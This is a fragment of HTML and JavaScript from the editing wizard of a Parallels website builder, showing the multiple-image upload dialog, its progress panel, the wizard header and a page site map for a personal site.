<td class="sb-edit-panel-block-border" style="width:25%;height:100%;vertical-align:top;"><object classid="clsid:FEF7EDB0-837D-429B-8FD0-EF890F70C5B3" name="JamShellTreeX" id="JamShellTreeX" align="left" width="100%" height="500px" codebase="/applet/SWHTTPUploaderProj.cab"></object></td>
<td class="sb-edit-panel-block-border" style="width:75%;"><table class="sb-table-design" cellspacing="0" cellpadding="5" border="0" height="100%" style="border-width:0px;width:100%;border-collapse:collapse;">
<tr><td><object classid="clsid:5999A3EE-E436-434A-A277-5A8A83CF3E98" name="JamShellComboX" id="JamShellComboX" align="left" width="100%" height="24px" codebase="/applet/SWHTTPUploaderProj.cab"></object></td></tr>
<tr><td><table class="sb-table-design" cellspacing="0" cellpadding="0" border="0" style="border-width:0px;height:100%;width:100%;border-collapse:collapse;"><tr>
<td style="width:30%;white-space:nowrap;text-align:left;"><table><tr>
<td><table cellpadding="0" cellspacing="0" border="0" style="
                       cursor: pointer;" class="" id="ButtonSelectAllId" onclick="
                                                                   JamShellListX.SelectAll();
                                                                   SetSelectedCount();
                                                                   return false;
                                                                   "><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="ButtonSelectAllIdMainText">Select All</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" style="
                       cursor: pointer;" class="" id="ButtonUnSelectId" onclick="
                                                                       JamShellListX.ClearSelection();
                                                                       SetSelectedCount();
                                                                       return false;
                                                                   "><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="ButtonUnSelectIdMainText">Deselect All</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table></td>
</tr></table></td>
<td style="text-align:center;">
<span class="sb-label">Selected:..</span><span id="selectedImagesCountId" class="sb-text" style="font-weight:bold;"></span><span class="sb-text" style="font-weight:bold;">..image(s)</span>
</td>
<td style="width:30%;white-space:nowrap;text-align:right;"><span class="sb-text">Click images to select or deselect them.<br>Double-click images for full-sized preview.</span></td>
</tr></table></td></tr>
<tr style="height:420px;"><td><object classid="clsid:9CDE10DA-6917-4FEA-9E89-9FBB451D8BC8" name="JamShellListX" id="JamShellListX" align="left" width="100%" height="100%" codebase="/applet/SWHTTPUploaderProj.cab"></object></td></tr>
<tr><td style="white-space:nowrap;"><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr>
<td nowrap style="text-align: left; width: 1%">
<span class="sb-text" style="font-weight:bold;">Upload to category:..</span><select name="categoryDropdown" id="CategoryListId" class="sb-text" onchange="document.getElementById('NewCategoryId').style.display = (this.value == 'new') ? 'inline' : 'none'"><option value="1">Category1</option>
<option value="2">Category2</option>
<option value="new" selected>Create new category</option>
<option value="0">No category</option></select>
</td>
<td><input type="text" id="NewCategoryId" class="sb-control-input-input" style="width:100px"></td>
<td align="right">
<span class="sb-text" style="font-weight:bold">Resize images..</span><select id="ResizeResolutionId"><option value="1024|768">1024x768</option>
<option value="800|600">800x600</option>
<option value="640|480">640x480</option>
<option value="10000|10000">Do not resize</option></select>
</td>
</tr></table></td></tr>
</table></td>
</tr></table>
</td></tr></table>
<script for="JamShellListX" event="OnClick(e)" language="javascript">
SetSelectedCount();
</script><script type="text/javascript">
function initializeView() {
   ControlsInit();
   SetSelectedCount();
}

function StartImageUploading() {
   if(IsCategory()) {
       StartUpload();
   }
   else {
       alert(Localization['EmptyCategory']);
       return false;
   }
}

Localization['Progress'] = SbGetLocaleByKey('PROGRESS');
Localization['Alert'] = SbGetLocaleByKey('ALERT');
Localization['FileNoFound'] = SbGetLocaleByKey('FILE-NOT-FOUND');
Localization['NotResize'] = SbGetLocaleByKey('CANNOT-RESIZE-FILE');
Localization['HttpError'] = SbGetLocaleByKey('HTTP-ERROR');
Localization['CanNotUpload'] = SbGetLocaleByKey('FURIOUS-ERROR-MESSAGE');
Localization['EmptyCategory'] = SbGetLocaleByKey('EMPTY-CATEGORY-MESSAGE');

var BaseUrl = unescape('http%3A%2F%2Fvulnerarable.plesk.smb.10.2.0.site%3A2006%2FWizard%2FEdit%2FModules%2FImageGallery%2FImage%2FExternalUpload%3FSessionID%3D42b54cb11fc3aedbd%26currentPageId%3D1iqsyi3rp1o');
var PostBackScript = 'sbNavigationObject.go(baseUrl + "/Wizard/Edit/Modules/ImageGallery")';

var JamShellComboX = document.getElementById('JamShellComboX');
var JamShellTreeX = document.getElementById('JamShellTreeX');
var JamShellListX = document.getElementById('JamShellListX');
var JamShellLinkX = document.getElementById('JamShellLinkX');
var FileUploader = document.getElementById('FileUploader');
var JamSelectImages = document.getElementById('selectedImagesCountId');

var ButtonUploadId = 'ButtonUploadId';
var ButtonCancelId = 'ButtonCancelId';
var MultipleUploadDialogId = 'MultipleUploadDialogId';
var StatusUploadDialogId = 'StatusUploadDialogId';
var ResizeResolutionId = 'ResizeResolutionId';
var NewCategoryId = 'NewCategoryId';
var CategoryListId = 'CategoryListId';
var ButtonSelectAllId = 'ButtonSelectAllId';
var ButtonUnSelectId = 'ButtonUnSelectId';
var ProgressBarId = 'sbProgressBar';
var UploadetFileCountId = 'UploadetFileCountId';
var FromFileCountId = 'FromFileCountId';
var FileLeftCountId = 'FileLeftCountId';
var FileNameId = 'FileNameId';
var ErrorImageId = 'ErrorImageId';
var ProgressImageId = 'ProgressImageId';
var PanelErrorsId = 'PanelErrorsId';
var PanelPBId = 'PanelPBId';
var PanelFileNameId = 'PanelFileNameId';
var ErrorLabelId = 'ErrorLabelId';
var PanelProgressButtonsId = 'PanelProgressButtonsId';
var PanelErrorButonsId = 'PanelErrorButonsId';
RegisterOnloadAction("initializeView()");
</script><table><tr>
<td style="width:99%"><a href="#" onclick="javascript:sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery/ImageUpload')">If you do not see the Multiple Image Upload window, click here.</a></td>
<td><table align="center" onclick="StartImageUploading(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0" id="ButtonUploadId"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Upload</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td><table align="center" onclick="sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery'); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0" id="ButtonCancelId"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Cancel</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr></table>
</td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('MultipleUploadDialogId');
       </script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="StatusUploadDialogIdBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="StatusUploadDialogId" style="width:440px; height:250px; display:none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="StatusUploadDialogIdHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="StatusUploadDialogIdTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Progress</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery');"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top">
<table style="width:100%;height:80%"><tr>
<td style="width:70px; vertical-align:top">
<img id="ProgressImageId" src="/skins/WinXPReloadedCompact/icons/AddImage.png" alt="upload"><img id="ErrorImageId" src="/skins/WinXPReloadedCompact/icons/errorIcon.gif" alt="error" style="display:none">
</td>
<td style="vertical-align:top;align:left;width:99%;height:100%">
<table>
<tr><td class="sb-text" style="vertical-align:top">Images uploaded:..<span id="UploadetFileCountId">0</span>
                                   ..of..
                                   <span id="FromFileCountId">0</span>
</td></tr>
<tr id="PanelPBId"><td>
<script type="text/javascript" language="javascript" src="/js/progress_bar.js?5.0.0.2009110318"></script><div id="sbProgressBar" style="background-color: #F7F7F7;border: 1px solid #CCCCCC;margin: 8px;padding: 8px;text-align: left;display:block; width:300px; text-align:left; height:10px;"><div>
<table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right" style="white-space: nowrap;">
<span id="sbProgressBarStatus">0</span>% </td></tr></table>
<div style="width:0px; height:8px;"><span></span></div>
<div class="sb-publish-progress-block"><img id="sbProgressBarImage" src="/skins/WinXPReloadedCompact/images/publish_progress.gif" alt="" height="20" style="width:0%; border-width:0px;"></div>
</div></div>
<script type="text/javascript" language="javascript">
           var sbProgressBar = new SbProgressBar();
       </script>
</td></tr>
<tr><td class="sb-text">Images left: <span id="FileLeftCountId">0</span>
</td></tr>
<tr><td class="sb-text" id="PanelFileNameId"><span>Uploading:..<span id="FileNameId"></span></span></td></tr>
</table>
<div id="PanelErrorsId"><table><tr><td><span id="ErrorLabelId" class="sb-label-error"></span></td></tr></table></div>
</td>
</tr></table>
<div id="PanelProgressButtonsId"><table width="100%"><tr>
<td width="99%">..</td>
<td><table onclick="CancelUploadFiles();" style="cursor: pointer; width: 90px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td style="width: 1px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td style="background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); background-repeat:repeat-x; width: 1px; padding-left: 5px;"><img src="/skins/WinXPReloadedCompact/icons/cancel.gif"></td>
<td style="background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif);" align="center" class="sb-button-cancel">Cancel</td>
<td style="width: 1px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr></table></div>
<div id="PanelErrorButonsId"><table width="100%"><tr>
<td width="99%">..</td>
<td><table align="center" onclick="RetryUpload(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0" id="retryButtonId"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Retry</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td><table align="center" onclick="sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery'); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">OK</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr></table></div>
</td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('StatusUploadDialogId');
       </script><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%">
<tr id="TRHeader"><td COLSPAN="2">
<table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-top-container"><tr><td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;" class="sb-header-top"><tr>
<td width="100%"><div style="width: 205px; text-align: center;"><img align="middle" style="cursor: pointer;" alt="" border="0" src="/skins/WinXPReloadedCompact/images/def_sb_logo.gif?5.0.0.2009110318" onclick="window.open('http://www.parallels.com', '_new'); return false;"></div></td>
<td><table cellspacing="0" cellpadding="0" border="0" style="border-width:0px;border-collapse:collapse;"><tr>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Start');" style="cursor: pointer;"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_left.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_start_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Start</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Design');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_design_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Design</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Pages');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_pages_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Pages</td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_al.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_abg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_edit_abullet.gif"></td>
<td class="sb-steps-text-active" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_abg.gif);">Edit</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_ar.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Publish');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_publish_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Publish</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_right.gif"></td>
</tr></table></td>
</tr></table></td>
<td align="right" class="sb-header-company-logo"><img style="cursor: pointer" onclick="window.open('http://www.parallels.com', '_new'); return false;" border="0" src="/skins/WinXPReloadedCompact/images/def_parallels_logo_wizard.gif"></td>
</tr></table></td></tr></table>
<table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-bottom"><tr>
<td style="padding-left: 10px;">
<table cellpadding="0" cellspacing="0" border="0" style="
                       filter:alpha(opacity=40); opacity: 0.4;
                       " class="" id="saveChangesButton" onclick=""><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/button_middle.gif);padding-left:5px;padding-right:5px;" class=""><img src="/skins/WinXPReloadedCompact/icons/save_icon.gif"></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="saveChangesButtonMainText">Save Changes</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table>
<script type="text/javascript">
                           sbApplyChangesObject.addListener(enableSaveChangesButton);
                       </script>
</td>
<td style="padding-left: 10px; width: 100%;" onclick="sb_status.showDetails();" id="StatusBar">
<table cellpadding="0" cellspacing="3" width="100%" border="0" style="display:inline-block;width:100%;"><tr>
<td valign="middle"><img id="StatusIcon" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/icon_help.gif"></td>
<td valign="middle" width="100%" style="padding-left: 10px;"><div id="StatusMessage" class="sb-statusbar-text">Create and edit the content of your web site.</div></td>
</tr></table>
<script type="text/javascript" language="javascript" src="/js/Wizard/Status.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript">
                       sb_status = new SB_Status('/skins/WinXPReloadedCompact');
                       </script>
</td>
<td class="sb-header-bottom-right"><table cellspacing="0" cellpadding="0" border="0" style="height: 100%;"><tr><td><a style="text-decoration: none" onclick="javascript:try{window.open('http://download1.parallels.com/PPSMBE/10.0.0/Doc/help.htm?locale=en-US&amp;article=/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload&amp;help_type=user','_blank')}catch(e){}; void(0);" href="#"><table cellpadding="0" cellspacing="0" border="0" type="button" style="height:100%;"><tr>
<td style="padding: 5px;"><img style="border-width:0px;" width="16" height="16" src="/skins/WinXPReloadedCompact/icons/help.png"></td>
<td class="sb-tools-text" style="padding-right:10px;">Help</td>
</tr></table></a></td></tr></table></td>
</tr></table>
</td></tr>
<tr><td class="sb-wizard-layout-content">
<script type="text/javascript" src="/js/Wizard/panel_toogle.js?5.0.0.2009110318"></script><table border="0" cellpadding="0" cellspacing="0" style="height: 100%;width:100%" align="center"><tr><td style="vertical-align: top; " align="center"><table cellpadding="0" cellspacing="0" border="0" style="height: 100%;width:100%"><tr>
<td valign="top">
<input type="hidden" id="LeftPanelDiv_hidden" value="false"><input type="hidden" id="LeftPanelDiv_show_action" value="localeCode=en_US&amp;section=Wizard_Edit&amp;key=showSiteMap"><input type="hidden" id="LeftPanelDiv_hide_action" value="localeCode=en_US&amp;section=Wizard_Edit&amp;key=hideSiteMap"><table style="height:100%;" cellpadding="0" cellspacing="0" border="0" class="sb-edit-panel"><tr>
<td><div id="LeftPanelDiv" style="height: 100%; display: block;"><table width="200" cellspacing="8" cellpadding="8" border="0">
<tr valign="top" height="1"><td><b class="sb-text">Site map</b></td></tr>
<tr class="sb-edit-panel-block"><td class="sb-edit-panel-block-border" id="siteMapTd" valign="top" height="1">
<script src="/js/Wizard/Edit.js?5.0.0.2009110318" language="javascript"></script><script type="text/javascript" language="javascript"><!--
                                           var currentPageId = '1iqsyi3rp1o';
                                           var action = '/Wizard/Edit';
                                           Event.observe(window, 'load', siteMapOnResize);
                                           Event.observe(window, 'resize', siteMapOnResize);
                                           //--></script><table border="0" cellpadding="0" cellspacing="0" width="100%" height="100%" style="table-layout: fixed;"><tr><td valign="top">
<script type="text/javascript" language="javascript" src="/js/pages_tree.js?5.0.0.2009110318"></script><div id="edit" style="white-space: nowrap; overflow-x: hidden; overflow-y: auto; width:100%; height:100%;">
<script type="text/javascript" language="javascript"><!--
                   SbInitTree('edit', 'true', 'true', '', '', 'true', onNodeSelect, null, null, null);
                   var tree = document.getElementById('edit');
                   
               //--></script><div id="q485ez4jvyq" valign="middle">
<img id="q485ez4jvyqState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="q485ez4jvyqLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="q485ez4jvyqCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="q485ez4jvyqIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="q485ez4jvyqSpan" style="vertical-align: middle;">Home</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'q485ez4jvyq', 'page1.php', 'Simple', '', '', 'visible');
       </script><div id="hwal3pvmvz3" valign="middle">
<img id="hwal3pvmvz3State" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="hwal3pvmvz3Line" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="hwal3pvmvz3Check" type="checkbox" style="display: inline; vertical-align: middle;"><img id="hwal3pvmvz3Icon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="hwal3pvmvz3Span" style="vertical-align: middle;">About Me</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'hwal3pvmvz3', 'page2.php', 'Simple', '', '', 'visible');
       </script><div id="b1ynn2c224e" valign="middle">
<img id="b1ynn2c224eState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="b1ynn2c224eLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="b1ynn2c224eCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="b1ynn2c224eIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="b1ynn2c224eSpan" style="vertical-align: middle;">My Family</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'b1ynn2c224e', 'page3.php', 'Simple', '', '', 'visible');
       </script><div id="1iqsyi3rp1o" valign="middle">
<img id="1iqsyi3rp1oState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="1iqsyi3rp1oLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="1iqsyi3rp1oCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="1iqsyi3rp1oIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/modules/ImageGallery/images/icon.gif"><span id="1iqsyi3rp1oSpan" style="vertical-align: middle;">Photos</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', '1iqsyi3rp1o', 'page4.php', 'ImageGallery', 'true', '', 'visible');
       </script><div id="1mhpsivotpo" valign="middle">
<img id="1mhpsivotpoState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="1mhpsivotpoLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="1mhpsivotpoCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="1mhpsivotpoIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="1mhpsivotpoSpan" style="vertical-align: middle;">Resume</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', '1mhpsivotpo', 'page5.php', 'Simple', '', '', 'visible');
       </script><div id="q05ufw2vwxb" valign="middle">
<img id="q05ufw2vwxbState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="q05ufw2vwxbLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="q05ufw2vwxbCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="q05ufw2vwxbIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="q05ufw2vwxbSpan" style="vertical-align: middle;">Favorite Links</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'q05ufw2vwxb', 'page6.php', 'Simple', '', '', 'visible');
       </script><div id="pp2btyiv601" valign="middle">
<img id="pp2btyiv601State" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="pp2btyiv601Line" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="pp2btyiv601Check" type="checkbox" style="display: inline; vertical-align: middle;"><img id="pp2btyiv601Icon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="pp2btyiv601Span" style="vertical-align: middle;">Contact Me</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'pp2btyiv601', 'page7.php', 'Simple', '', '', 'visible');
       </script>
</div>
<script type="text/javascript" language="javascript"><!--
               SbRefreshTree('edit');
           //--></script>
</td></tr></table>
<script type="text/javascript" language="javascript">
                           var knownPagesFileNames = new Array('index');
                           knownPagesFileNames.push('page1');

       registerPageEditView('q485ez4jvyq', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page2');

       registerPageEditView('hwal3pvmvz3', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page3');

       registerPageEditView('b1ynn2c224e', '/Wizard/Edit/Html');
       

       registerPageEditView('1iqsyi3rp1o', '/Wizard/Edit/Modules/ImageGallery');
       knownPagesFileNames.push('page5');

       registerPageEditView('1mhpsivotpo', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page6');

       registerPageEditView('q05ufw2vwxb', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page7');

       registerPageEditView('pp2btyiv601', '/Wizard/Edit/Html');
       </script>
</td></tr>
<tr class="sb-edit-panel-block"><td class="sb-edit-panel-block-border" id="pageInfoTd" valign="top" height="1">
<script>
           sbNavigationObject.registerOnSubmitFunction(validateForm);
       </script><table height="160px" width="100%" border="0" cellpadding="0" cellspacing="0" style="table-layout: fixed;">
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page title</span><span style="color:Red; width: 10px;">*</span><br><input id="pageTitle" name="pageTitle" type="text" maxlength="255" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:100%;" onchange="self.sbApplyChangesObject.registerChange();" value="Photos">
</td></tr>
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page file name</span><span style="color:Red; width: 10px;">*</span><br><input id="pageFileName" name="pageFileName" type="text" maxlength="255" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:140px;" onchange="self.sbApplyChangesObject.registerChange();" value="page4"><span class="sb-text">.php</span>
</td></tr>
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page keywords</span><br><textarea id="pageKeywords" name="pageKeywords" rows="2" cols="20" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:100%;" onchange="self.sbApplyChangesObject.registerChange();"></textarea>
</td></tr>
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page description</span><br><textarea id="pageDescription" name="pageDescription" rows="2" cols="20" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:100%;" onchange="self.sbApplyChangesObject.registerChange();"></textarea>
</td></tr>
<tr><td>
<span style="color:Red; padding-right: 5px;">*</span><span class="sb-text">Required fields</span><br>
</td></tr>
<tr><td style="height: 20px;"><img width="100%" height="1" src="/skins/WinXPReloadedCompact/images/line.gif"></td></tr>
<tr><td><table cellpadding="0" cellspacing="0" border="0" class="control-input-title"><tr>
<td class="input-block"><input id="pageShowInNavigation" type="checkbox" name="pageShowInNavigation" onchange="self.sbApplyChangesObject.registerChange();" class="sb-check" checked></td>
<td class="title-block"><label class="name" for="pageShowInNavigation">Show this page in site map</label></td>
</tr></table></td></tr>
<tr><td align="center" style="padding-top: 10px">
<table cellpadding="0" cellspacing="0" border="0" style="
                       filter:alpha(opacity=40); opacity: 0.4;
                       width: 100%" class="" id="plainPageButton" onclick=""><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="sb-button-disabled" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="plainPageButtonMainText">Remove Design Template</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table>
<input type="hidden" id="isPlainPage" name="isPlainPage" value="0">
</td></tr>
</table>
<input type="hidden" name="currentPageId" id="page" value="1iqsyi3rp1o">
</td></tr>
</table></div></td>
